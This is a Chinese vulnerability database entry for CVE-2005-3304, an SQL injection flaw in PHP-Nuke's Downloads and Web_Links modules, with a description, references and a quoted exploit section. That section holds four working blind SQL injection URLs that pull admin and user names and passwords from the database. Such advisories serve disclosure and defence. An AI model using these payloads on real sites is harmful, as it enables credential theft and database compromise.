PHP-Nuke多个模块远程SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117282 漏洞类型 SQL注入
发布时间 2009-01-23 更新时间 2009-01-23
CVE编号 CVE-2005-3304 CNNVD-ID CNNVD-200510-194
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/32747
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-194
|漏洞详情
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。PHP-Nuke软件包的多个模块实现上存在SQL注入漏洞,远程攻击者可能利用漏洞非授权访问数据库导致敏感信息泄露或数据破坏。PHP-Nuke的Downloads模块对url参数和Web_Links模块对description参数没有做充分的检查过滤,远程攻击者可以在输入数据中插入恶意SQL语句串非授权操作数据库。
|漏洞EXP
source: http://www.securityfocus.com/bid/33410/info

The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Admin Username :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+a
id+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*

Admin Password :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+p
wd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*

Users Username :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+u
sername+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*

Users Password :
http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+u
ser_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
|参考资料

来源:SECUNIA
名称:17315
链接:http://secunia.com/advisories/17315/
来源:MISC
链接:http://rgod.altervista.org/phpnuke78sql.html
来源:BUGTRAQ
名称:20051023PhpNuke7.8withallsecurityfixes/patches"Your_Account",
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113017049702436&w=2
来源:BUGTRAQ
名称:20051023PhpNuke7.8withallsecurityfixes/patches"Your_Account",
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113017049702436&w=2
来源:XF
名称:phpnuke-multiple-modules-sql-injection(22851)
链接:http://xforce.iss.net/xforce/xfdb/22851
来源:BID
名称:15178
链接:http://www.securityfocus.com/bid/15178
来源:OSVDB
名称:20293
链接:http://www.osvdb.org/20293
来源:OSVDB
名称:20292
链接:http://www.osvdb.org/20292
来源:OSVDB
名称:20291
链接:http://www.osvdb.org/20291
来源:VUPEN
名称:ADV-2005-2191
链接:http://www.frsirt.com/english/advisories/2005/2191